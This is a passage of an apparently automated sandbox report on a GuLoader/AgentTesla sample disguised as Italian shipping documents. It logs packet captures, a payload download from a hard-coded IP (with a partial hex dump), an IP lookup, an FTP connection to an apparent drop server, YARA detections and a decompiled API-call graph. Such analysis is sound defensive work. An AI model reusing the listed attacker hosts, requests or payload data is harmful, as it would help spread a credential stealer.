                                                Dec 4, 2024 13:40:16.359044075 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.360747099 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.360810041 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.360883951 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.360938072 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.362670898 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.362725019 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.362850904 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.362900019 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.364540100 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.364602089 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.364696980 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.364742994 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.366560936 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.366619110 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.366733074 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.366777897 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.368520021 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.368594885 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.368629932 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.368676901 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.370511055 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.370568037 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:16.370604038 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:16.370649099 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:17.151731968 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:17.151776075 CET44349853104.26.13.205192.168.2.6
                                                Dec 4, 2024 13:40:17.151854992 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:17.165534973 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:17.165550947 CET44349853104.26.13.205192.168.2.6
                                                Dec 4, 2024 13:40:18.426090002 CET44349853104.26.13.205192.168.2.6
                                                Dec 4, 2024 13:40:18.426203012 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:18.428172112 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:18.428194046 CET44349853104.26.13.205192.168.2.6
                                                Dec 4, 2024 13:40:18.428457022 CET44349853104.26.13.205192.168.2.6
                                                Dec 4, 2024 13:40:18.471939087 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:18.488265991 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:18.535336018 CET44349853104.26.13.205192.168.2.6
                                                Dec 4, 2024 13:40:18.874541044 CET44349853104.26.13.205192.168.2.6
                                                Dec 4, 2024 13:40:18.874605894 CET44349853104.26.13.205192.168.2.6
                                                Dec 4, 2024 13:40:18.874694109 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:18.887998104 CET49853443192.168.2.6104.26.13.205
                                                Dec 4, 2024 13:40:20.339139938 CET4986221192.168.2.6192.185.13.234
                                                Dec 4, 2024 13:40:20.459275007 CET2149862192.185.13.234192.168.2.6
                                                Dec 4, 2024 13:40:20.459418058 CET4986221192.168.2.6192.185.13.234
                                                Dec 4, 2024 13:40:20.463634968 CET4986221192.168.2.6192.185.13.234
                                                Dec 4, 2024 13:40:20.583533049 CET2149862192.185.13.234192.168.2.6
                                                Dec 4, 2024 13:40:20.583822012 CET4986221192.168.2.6192.185.13.234
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 4, 2024 13:40:17.007365942 CET5482553192.168.2.61.1.1.1
                                                Dec 4, 2024 13:40:17.145405054 CET53548251.1.1.1192.168.2.6
                                                Dec 4, 2024 13:40:19.650450945 CET5291253192.168.2.61.1.1.1
                                                Dec 4, 2024 13:40:20.337759972 CET53529121.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 4, 2024 13:40:17.007365942 CET192.168.2.61.1.1.10x848eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Dec 4, 2024 13:40:19.650450945 CET192.168.2.61.1.1.10x4d56Standard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 4, 2024 13:40:17.145405054 CET1.1.1.1192.168.2.60x848eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Dec 4, 2024 13:40:17.145405054 CET1.1.1.1192.168.2.60x848eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Dec 4, 2024 13:40:17.145405054 CET1.1.1.1192.168.2.60x848eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Dec 4, 2024 13:40:20.337759972 CET1.1.1.1192.168.2.60x4d56No error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 4, 2024 13:40:20.337759972 CET1.1.1.1192.168.2.60x4d56No error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                                • api.ipify.org
                                                • 109.248.150.252
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649845109.248.150.252805684C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 4, 2024 13:40:14.248409033 CET187OUTGET /WrqjRdXcfPugZeXkIIJdo57.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: 109.248.150.252
                                                Cache-Control: no-cache
                                                Dec 4, 2024 13:40:15.536971092 CET1236INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Wed, 04 Dec 2024 08:49:36 GMT
                                                Accept-Ranges: bytes
                                                ETag: "6cb578722946db1:0"
                                                Server: Microsoft-IIS/8.5
                                                Date: Wed, 04 Dec 2024 12:40:13 GMT
                                                Content-Length: 241728
                                                Data Raw: f0 45 3d f5 99 29 9b 9b 94 01 17 65 de e9 fa d0 18 35 d5 4f 51 43 f0 c3 73 02 bc 5a 40 1d 58 76 3b 8b 63 6e f6 06 0c f6 2e 23 30 89 b5 21 21 f6 cd 1d 22 2f b5 74 e6 c8 d7 50 61 d8 45 ce 59 57 13 03 9e ac 92 eb aa 93 d5 d8 63 9d f0 42 47 3a 33 35 6f 01 f2 14 d7 8c 6f 30 d4 be 82 ad 33 dc 75 c0 c5 71 12 90 cd b7 02 12 15 76 aa a0 7e 10 5d c3 51 99 b1 07 50 6b da ba 4f 58 53 f7 e2 e9 09 22 08 15 55 b2 dd 03 a8 f4 fb 7c 15 6e 6e 46 5b 41 4b 5d ce fc 82 a3 91 6e d9 d3 ca 06 77 96 53 29 89 1d f8 31 92 c5 0a c7 b8 6a d7 35 45 55 26 1d 0f 20 77 f7 b0 8d 14 6f 57 33 2a 64 30 dc 9e 16 21 f6 c6 43 76 2a 69 2b ea d6 0d df 2c 7a 14 af 37 4e b4 7a 4f b9 75 3b a6 c8 e1 52 d6 fe 6f 5d 75 64 82 e2 1f 6b ae ea ea fb 8e 4a 60 3b 1b 88 ab ca c9 0c 99 19 99 ac 59 8d 37 3e d9 a2 a6 82 24 1e 58 88 0f c4 53 f7 37 fd 4a 45 60 fd 22 12 9b d3 c1 f2 33 27 d8 32 1d 1d 15 d0 da 00 7d 6b b7 fd 78 87 0d c4 0b 2d de 1f 15 7d c0 3d 7a 6b 72 58 b3 f5 26 8f 54 da 44 a8 61 15 0c 73 ce 9f f2 ec 4c c3 1b 9a 6d 78 aa 39 9b 4f 43 f7 d3 d8 [TRUNCATED]
                                                Data Ascii: E=)e5OQCsZ@Xv;cn.#0!!"/tPaEYWcBG:35oo03uqv~]QPkOXS"U|nnF[AK]nwS)1j5EU& woW3*d0!Cv*i+,z7NzOu;Ro]udkJ`;Y7>$XS7JE`"3'2}kx-}=zkrX&TDasLmx9OC?a7 /s%o>}"2: #BPZHS>C= W/)~7K#\iy6Eb0hHsn))7[%O0u%=*\g>ViiS[W0l_'|0Z/[03V]\irCa&sJ5)d J{;qW&=lkYAVhFVfCY3f3gSeYEMnI$97ctPR=MBvjblm*JFC8#Q9.hm GMn(J0Ytf=k73 :;lz3~Iu dD?r&g^$`bOEb&/VvV&?#Y*EBOJ.Gp[|G$F5uLtpI-4&X/Iw3tkD@EDhg4'~t,qW#I+[(7_E1og]qU Ok/>0wp
                                                Dec 4, 2024 13:40:15.537138939 CET1236INData Raw: 71 b0 cb cd b2 17 b2 87 4d c5 06 33 ec 58 b3 29 0a 73 0d 76 ec 5d f9 03 4f b4 c9 38 31 73 1b f5 97 c9 0a ba 23 9f 87 b7 ad 2b 61 4e 19 fe f3 bb de 20 45 bf a6 f0 1c c5 d0 5e 78 60 8a 21 7d e3 14 cc 30 5f d1 a8 5d 2d 2a 2f 6b 74 58 26 53 a1 21 8b
                                                Data Ascii: qM3X)sv]O81s#+aN E^x`!}0_]-*/ktX&S!JI72c]Q$i=i6q3W_o!qsv]:YNPBX^YpE8u3@/03_e(0u~YPaOY+LLLO>.m$,
                                                Dec 4, 2024 13:40:15.537153006 CET1236INData Raw: 9b e6 11 05 d6 84 2f 68 ca 13 ee b4 5c 71 1d ac 91 e1 a8 e1 ca f8 63 ed 27 54 47 3a 8d 1f 71 03 89 8c d7 8c 2b 1a f6 bc 81 d0 ab dc 75 c4 ef 3b 10 b8 de b7 02 18 17 04 2d 81 7e 60 75 2e 51 99 b7 2d 4e 69 a1 23 4f 58 d7 dd c0 eb 04 40 2b 1b 55 02
                                                Data Ascii: /h\qc'TG:q+u;-~`u.Q-Ni#OX@+Ud0E8\k]`)##z>}*RuKxi7W3,N.!hW(Q0$NTpO{ikf~kD;l$[0%^,j7NoB!Om@P
                                                Dec 4, 2024 13:40:15.537456036 CET1236INData Raw: 39 95 b0 e2 8e 0d df 26 fa c5 af 37 4a 7e 64 4f c3 ac 3a ad cc cb d6 d7 fd 12 87 75 64 86 c8 01 69 3b fc e9 fb 8a 40 42 39 18 15 7b ca c9 08 f3 07 9b f7 82 8d 37 38 f3 80 a0 81 59 c5 58 88 0b ee 49 f5 4c 21 4a 45 64 d7 00 30 9c ae 1d f0 33 23 f2
                                                Data Ascii: 9&7J~dO:udi;@B9{78YXIL!JEd03#,fWIJn=~APZTnc=sZPE!9`?c^=t1 [%o|<| &!GxXR<F&Q`iG^ G480hLYi
                                                Dec 4, 2024 13:40:15.537467957 CET896INData Raw: 37 09 28 a8 19 bd 2f d8 10 5b 91 25 6f e7 90 7b 14 3e 7d 7f d7 22 87 32 c4 95 96 20 03 43 50 e5 0a e9 b1 63 0a 92 eb 48 7b a1 81 3e 85 63 a8 3d a2 16 de 87 16 57 f8 d1 80 ad c0 09 7c 1b 12 17 0f ce 7a 2d f4 5c 16 41 c5 a8 cf dd e3 f4 1d e6 79 59
                                                Data Ascii: 7(/[%o{>}"2 CPcH{>c=W|z-\AyYIEb`Hsnw/7[g/O0u%l\%TViSrXW0k_'1Zo&[vU\|CaX@rJu(Pd{q<m#=!kc
                                                Dec 4, 2024 13:40:15.617566109 CET1236INData Raw: 03 f9 98 bd 68 19 f3 d9 07 ef 78 26 4e e3 ab 58 bb d6 4a e3 52 01 75 4b 78 c9 bb 55 f9 bd a7 34 6f 57 33 58 07 30 dc be f1 df fa 89 42 5d 32 95 c0 c0 c2 62 df 2c 0a 3c a6 37 4e 52 84 44 b8 7e 48 d0 c8 e1 84 fd e3 6f 55 7f 4c 91 e0 1f 6d 9d ad e9
                                                Data Ascii: hx&NXJRuKxU4oW3X0B]2b,<7NRD~HoULmL7hY2\!xWJ5.73'$.}x]mgwX&TaeV_9O;a G(%spu>}2: #BPfZHSy>=
                                                Dec 4, 2024 13:40:15.617719889 CET224INData Raw: 15 6d ca c3 77 6e 72 70 97 f5 26 85 6e b9 bb 57 9e c8 1c 73 5a 5a 0f e1 1e c3 e5 8c 6b 98 a9 22 b2 6c 43 f7 d9 04 c1 05 b8 61 fd d8 a4 14 3d f7 d8 af 20 8b ef d8 10 73 68 28 69 e1 98 49 14 3e 77 7f d7 26 87 cc 36 9d 96 5b 12 43 50 e1 2a 10 b0 5a
                                                Data Ascii: mwnrp&nWsZZk"lCa= sh(iI>w&6[CP*ZHS}0CT1W]YB#\eD@6E!hHb*my#)ERc& %u1*}|P&;SSnPW8y_WT'P.
                                                Dec 4, 2024 13:40:15.617729902 CET1236INData Raw: 59 eb 33 cf 63 47 56 5d 2c 70 19 65 75 d3 6b 79 ef 54 fc 3c 32 f3 06 01 51 b3 75 f9 de 7d b0 ed 7f a9 1b af 56 9b fd c8 ce 01 13 b4 00 98 7b c5 f2 79 e0 e0 49 52 72 26 96 89 e1 41 28 a1 6b 62 63 1f d4 9e 38 0d a0 8b 45 a3 71 db 8d 68 f0 5a 57 ad
                                                Data Ascii: Y3cGV],peukyT<2Qu}V{yIRr&A(kbc8EqhZWfYI2>1tWWYE9MnG:7LfW0d"xxB=Jg%$PF`D)M:d-{mu.'Tven~e^l/
                                                Dec 4, 2024 13:40:15.617742062 CET1236INData Raw: 61 0d 11 eb cd cc 2d 8f b6 70 9a f7 23 eb e4 86 c9 7f e9 0f 51 01 9e 4e 1d 44 17 06 df 0f 66 1c c2 ff ee e5 38 9d 1a b0 b5 68 a5 20 48 34 5d 84 12 38 b5 09 62 3a d4 e5 9a a5 b4 fc e6 6a 54 95 2e df 6a 6d 6d 7b d3 b3 93 cf 0a 12 54 3e 7d a9 f9 4d
                                                Data Ascii: a-p#QNDf8h H4]8b:jT.jmm{T>}MG^ fC[-U\KT:w'7Lenv.=ST%lsnRw;,)bo+k(1K@PIl37X]9T3?iR#
                                                Dec 4, 2024 13:40:15.656800032 CET1236INData Raw: 3d d9 ad ab 1d 01 fa 87 6c f8 bc 75 ce 36 6b 8a 55 13 a2 0d 57 87 31 4a cb d0 a7 47 a8 04 fc 57 7c 1f 42 b7 47 c1 89 0d 94 b0 41 c8 00 80 28 ef c2 17 4b e6 8b 42 0a 89 70 fa e4 d6 49 c5 65 0a 12 e0 6e 13 0d 0e 03 58 2f 22 e4 bb 49 8c 6b 92 39 20
                                                Data Ascii: =lu6kUW1JGW|BGA(KBpIenX/"Ik9 p^kN&-eq/{AESs324:Zp)xaD@o*e="S{wJT8}2Dp:4B'[E(a&#^5!k
                                                Dec 4, 2024 13:40:15.656929016 CET1236INData Raw: 04 57 ac 7c a4 b8 73 17 1b 78 1b 3a 47 6a 2a fb 13 b9 3d 15 f3 f7 fd 02 22 5d 5d 05 c3 55 b1 c9 ca b6 ea bf 83 61 8e f8 ca c6 73 40 0f a3 fa 34 f0 3d ef 98 a0 f6 52 f0 1a 8c 41 1b f5 9d 37 04 be dc bf 82 37 ad 2b 9f c0 95 fe 0c 45 d2 2c c5 9f 20
                                                Data Ascii: W|sx:Gj*="]]Uas@4=RA77+E, E._Au!\CM~H#-I+PM\n>mqq3U\$-z;yZu3?h^TCGO)+027{:vi]P


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649853104.26.13.2054435684C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-04 12:40:18 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-12-04 12:40:18 UTC424INHTTP/1.1 200 OK
                                                Date: Wed, 04 Dec 2024 12:40:18 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8ecbdd3cd91e41e9-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1665&rtt_var=636&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1706604&cwnd=248&unsent_bytes=0&cid=950d2a732ab65b81&ts=457&x=0"
                                                2024-12-04 12:40:18 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                Data Ascii: 8.46.123.228


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:07:39:02
                                                Start date:04/12/2024
                                                Path:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"
                                                Imagebase:0x400000
                                                File size:602'669 bytes
                                                MD5 hash:A10E959289C077BC452DE5C48ABD7262
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2721160170.0000000003B68000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:07:40:03
                                                Start date:04/12/2024
                                                Path:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"
                                                Imagebase:0x400000
                                                File size:602'669 bytes
                                                MD5 hash:A10E959289C077BC452DE5C48ABD7262
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3389706331.000000003333C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3389706331.0000000033311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3389706331.0000000033311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:16.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.1%
                                                  Total number of Nodes:1600
                                                  Total number of Limit Nodes:34
                                                  execution_graph 5149 73d81058 5151 73d81074 5149->5151 5150 73d810dd 5151->5150 5153 73d81092 5151->5153 5162 73d815b6 5151->5162 5154 73d815b6 GlobalFree 5153->5154 5155 73d810a2 5154->5155 5156 73d810a9 GlobalSize 5155->5156 5157 73d810b2 5155->5157 5156->5157 5158 73d810c7 5157->5158 5159 73d810b6 GlobalAlloc 5157->5159 5161 73d810d2 GlobalFree 5158->5161 5160 73d815dd 3 API calls 5159->5160 5160->5158 5161->5150 5164 73d815bc 5162->5164 5163 73d815c2 5163->5153 5164->5163 5165 73d815ce GlobalFree 5164->5165 5165->5153 5166 401bc0 5167 401c11 5166->5167 5168 401bcd 5166->5168 5170 401c16 5167->5170 5171 401c3b GlobalAlloc 5167->5171 5169 4023af 5168->5169 5175 401be4 5168->5175 5173 4066df 21 API calls 5169->5173 5179 401c56 5170->5179 5187 4066a2 lstrcpynW 5170->5187 5172 4066df 21 API calls 5171->5172 5172->5179 5174 4023bc 5173->5174 5174->5179 5180 405d02 MessageBoxIndirectW 5174->5180 5185 4066a2 lstrcpynW 5175->5185 5177 401c28 GlobalFree 5177->5179 5180->5179 5181 401bf3 5186 4066a2 lstrcpynW 5181->5186 5183 401c02 5188 4066a2 lstrcpynW 5183->5188 5185->5181 5186->5183 5187->5177 5188->5179 5189 406dc0 5190 406c44 5189->5190 5191 4075af 5190->5191 5192 406cc5 GlobalFree 5190->5192 5193 406cce GlobalAlloc 5190->5193 5194 406d45 GlobalAlloc 5190->5194 5195 406d3c GlobalFree 5190->5195 5192->5193 5193->5190 5193->5191 5194->5190 5194->5191 5195->5194 5196 402641 5197 402dcb 21 API calls 5196->5197 5198 402648 5197->5198 5201 406192 GetFileAttributesW CreateFileW 5198->5201 5200 402654 5201->5200 4302 4025c3 4314 402e0b 4302->4314 4306 4025d6 4307 4025e5 4306->4307 4310 402953 4306->4310 4308 4025f2 RegEnumKeyW 4307->4308 4309 4025fe RegEnumValueW 4307->4309 4311 40261a RegCloseKey 4308->4311 4309->4311 4312 402613 4309->4312 4311->4310 4312->4311 4315 402dcb 21 API calls 4314->4315 4316 402e22 4315->4316 4317 40650f RegOpenKeyExW 4316->4317 4318 4025cd 4317->4318 4319 402da9 4318->4319 4320 4066df 21 API calls 4319->4320 4321 402dbe 4320->4321 4321->4306 5202 4015c8 5203 402dcb 21 API calls 5202->5203 5204 4015cf SetFileAttributesW 5203->5204 5205 4015e1 5204->5205 5213 401fc9 5214 402dcb 21 API calls 5213->5214 5215 401fcf 5214->5215 5216 405727 28 API calls 5215->5216 5217 401fd9 5216->5217 5218 405c85 2 API calls 5217->5218 5219 401fdf 5218->5219 5220 402002 CloseHandle 5219->5220 5221 402953 5219->5221 5226 406b41 WaitForSingleObject 5219->5226 5220->5221 5224 401ff4 5224->5220 5231 4065e9 wsprintfW 5224->5231 5227 406b5b 5226->5227 5228 406b6d GetExitCodeProcess 5227->5228 5229 406ad2 2 API calls 5227->5229 5228->5224 5230 406b62 WaitForSingleObject 5229->5230 5230->5227 5231->5220 5232 404acb 5233 404b01 5232->5233 5234 404adb 5232->5234 5242 404688 5233->5242 5239 404621 5234->5239 5237 404ae8 SetDlgItemTextW 5237->5233 5240 4066df 21 API calls 5239->5240 5241 40462c SetDlgItemTextW 5240->5241 5241->5237 5243 4046a0 GetWindowLongW 5242->5243 5244 40474b 5242->5244 5243->5244 5245 4046b5 5243->5245 5245->5244 5246 4046e2 GetSysColor 5245->5246 5247 4046e5 5245->5247 5246->5247 5248 4046f5 SetBkMode 5247->5248 5249 4046eb SetTextColor 5247->5249 5250 404713 5248->5250 5251 40470d GetSysColor 5248->5251 5249->5248 5252 404724 5250->5252 5253 40471a SetBkColor 5250->5253 5251->5250 5252->5244 5254 404737 DeleteObject 5252->5254 5255 40473e CreateBrushIndirect 5252->5255 5253->5252 5254->5255 5255->5244 4812 40254f 4813 402e0b 21 API calls 4812->4813 4814 402559 4813->4814 4815 402dcb 21 API calls 4814->4815 4816 402562 4815->4816 4817 40256d RegQueryValueExW 4816->4817 4818 402953 4816->4818 4819 402593 RegCloseKey 4817->4819 4820 40258d 4817->4820 4819->4818 4820->4819 4823 4065e9 wsprintfW 4820->4823 4823->4819 4824 4021cf 4825 402dcb 21 API calls 4824->4825 4826 4021d6 4825->4826 4827 402dcb 21 API calls 4826->4827 4828 4021e0 4827->4828 4829 402dcb 21 API calls 4828->4829 4830 4021ea 4829->4830 4831 402dcb 21 API calls 4830->4831 4832 4021f4 4831->4832 4833 402dcb 21 API calls 4832->4833 4834 4021fe 4833->4834 4835 40223d CoCreateInstance 4834->4835 4836 402dcb 21 API calls 4834->4836 4837 40225c 4835->4837 4836->4835 4838 401423 28 API calls 4837->4838 4839 40231b 4837->4839 4838->4839 5259 40204f 5260 402dcb 21 API calls 5259->5260 5261 402056 5260->5261 5262 406a96 5 API calls 5261->5262 5263 402065 5262->5263 5264 402081 GlobalAlloc 5263->5264 5266 4020f1 5263->5266 5265 402095 5264->5265 5264->5266 5267 406a96 5 API calls 5265->5267 5268 40209c 5267->5268 5269 406a96 5 API calls 5268->5269 5270 4020a6 5269->5270 5270->5266 5274 4065e9 wsprintfW 5270->5274 5272 4020df 5275 4065e9 wsprintfW 5272->5275 5274->5272 5275->5266 5276 401a55 5277 402dcb 21 API calls 5276->5277 5278 401a5e ExpandEnvironmentStringsW 5277->5278 5279 401a72 5278->5279 5281 401a85 5278->5281 5280 401a77 lstrcmpW 5279->5280 5279->5281 5280->5281 4940 4023d7 4941 4023e5 4940->4941 4942 4023df 4940->4942 4944 402dcb 21 API calls 4941->4944 4946 4023f3 4941->4946 4943 402dcb 21 API calls 4942->4943 4943->4941 4944->4946 4945 402401 4948 402dcb 21 API calls 4945->4948 4946->4945 4947 402dcb 21 API calls 4946->4947 4947->4945 4949 40240a WritePrivateProfileStringW 4948->4949 4950 4014d7 4951 402da9 21 API calls 4950->4951 4952 4014dd Sleep 4951->4952 4954 402c4f 4952->4954 5282 404757 lstrcpynW lstrlenW 5288 402459 5289 402461 5288->5289 5290 40248c 5288->5290 5291 402e0b 21 API calls 5289->5291 5292 402dcb 21 API calls 5290->5292 5293 402468 5291->5293 5294 402493 5292->5294 5296 402dcb 21 API calls 5293->5296 5297 4024a0 5293->5297 5299 402e89 5294->5299 5298 402479 RegDeleteValueW RegCloseKey 5296->5298 5298->5297 5300 402e96 5299->5300 5301 402e9d 5299->5301 5300->5297 5301->5300 5303 402ece 5301->5303 5304 40650f RegOpenKeyExW 5303->5304 5305 402efc 5304->5305 5306 402f0c RegEnumValueW 5305->5306 5307 402f2f 5305->5307 5314 402fa6 5305->5314 5306->5307 5308 402f96 RegCloseKey 5306->5308 5307->5308 5309 402f6b RegEnumKeyW 5307->5309 5310 402f74 RegCloseKey 5307->5310 5313 402ece 6 API calls 5307->5313 5308->5314 5309->5307 5309->5310 5311 406a96 5 API calls 5310->5311 5312 402f84 5311->5312 5312->5314 5315 402f88 RegDeleteKeyW 5312->5315 5313->5307 5314->5300 5315->5314 5316 40175a 5317 402dcb 21 API calls 5316->5317 5318 401761 SearchPathW 5317->5318 5319 40177c 5318->5319 5320 73d82d43 5321 73d82d5b 5320->5321 5322 73d8162f 2 API calls 5321->5322 5323 73d82d76 5322->5323 5324 401d5d 5325 402da9 21 API calls 5324->5325 5326 401d64 5325->5326 5327 402da9 21 API calls 5326->5327 5328 401d70 GetDlgItem 5327->5328 5329 40265d 5328->5329 5337 4047e0 5338 4047f8 5337->5338 5342 404912 5337->5342 5343 404621 22 API calls 5338->5343 5339 40497c 5340 404a46 5339->5340 5341 404986 GetDlgItem 5339->5341 5347 404688 8 API calls 5340->5347 5344 404a07 5341->5344 5348 4049a0 5341->5348 5342->5339 5342->5340 5345 40494d GetDlgItem SendMessageW 5342->5345 5346 40485f 5343->5346 5344->5340 5349 404a19 5344->5349 5370 404643 EnableWindow 5345->5370 5351 404621 22 API calls 5346->5351 5352 404a41 5347->5352 5348->5344 5353 4049c6 SendMessageW LoadCursorW SetCursor 5348->5353 5354 404a2f 5349->5354 5355 404a1f SendMessageW 5349->5355 5357 40486c CheckDlgButton 5351->5357 5374 404a8f 5353->5374 5354->5352 5359 404a35 SendMessageW 5354->5359 5355->5354 5356 404977 5371 404a6b 5356->5371 5368 404643 EnableWindow 5357->5368 5359->5352 5363 40488a GetDlgItem 5369 404656 SendMessageW 5363->5369 5365 4048a0 SendMessageW 5366 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5365->5366 5367 4048bd GetSysColor 5365->5367 5366->5352 5367->5366 5368->5363 5369->5365 5370->5356 5372 404a79 5371->5372 5373 404a7e SendMessageW 5371->5373 5372->5373 5373->5339 5377 405cc8 ShellExecuteExW 5374->5377 5376 4049f5 LoadCursorW SetCursor 5376->5344 5377->5376 5378 73d81979 5379 73d8199c 5378->5379 5380 73d819d1 GlobalFree 5379->5380 5381 73d819e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5379->5381 5380->5381 5382 73d81312 2 API calls 5381->5382 5383 73d81b6e GlobalFree GlobalFree 5382->5383 5384 402663 5385 402692 5384->5385 5386 402677 5384->5386 5387 4026c2 5385->5387 5388 402697 5385->5388 5389 402da9 21 API calls 5386->5389 5391 402dcb 21 API calls 5387->5391 5390 402dcb 21 API calls 5388->5390 5396 40267e 5389->5396 5392 40269e 5390->5392 5393 4026c9 lstrlenW 5391->5393 5401 4066c4 WideCharToMultiByte 5392->5401 5393->5396 5395 4026b2 lstrlenA 5395->5396 5397 40270c 5396->5397 5398 4026f6 5396->5398 5400 406273 5 API calls 5396->5400 5398->5397 5399 406244 WriteFile 5398->5399 5399->5397 5400->5398 5401->5395 4322 403665 SetErrorMode GetVersionExW 4323 4036f1 4322->4323 4324 4036b9 GetVersionExW 4322->4324 4325 403748 4323->4325 4326 406a96 5 API calls 4323->4326 4324->4323 4327 406a26 3 API calls 4325->4327 4326->4325 4328 40375e lstrlenA 4327->4328 4328->4325 4329 40376e 4328->4329 4330 406a96 5 API calls 4329->4330 4331 403775 4330->4331 4332 406a96 5 API calls 4331->4332 4333 40377c 4332->4333 4334 406a96 5 API calls 4333->4334 4335 403788 #17 OleInitialize SHGetFileInfoW 4334->4335 4410 4066a2 lstrcpynW 4335->4410 4338 4037d7 GetCommandLineW 4411 4066a2 lstrcpynW 4338->4411 4340 4037e9 4341 405f9e CharNextW 4340->4341 4342 40380f CharNextW 4341->4342 4344 403821 4342->4344 4343 403923 4345 403937 GetTempPathW 4343->4345 4344->4343 4344->4344 4350 405f9e CharNextW 4344->4350 4356 403925 4344->4356 4412 403634 4345->4412 4347 40394f 4348 403953 GetWindowsDirectoryW lstrcatW 4347->4348 4349 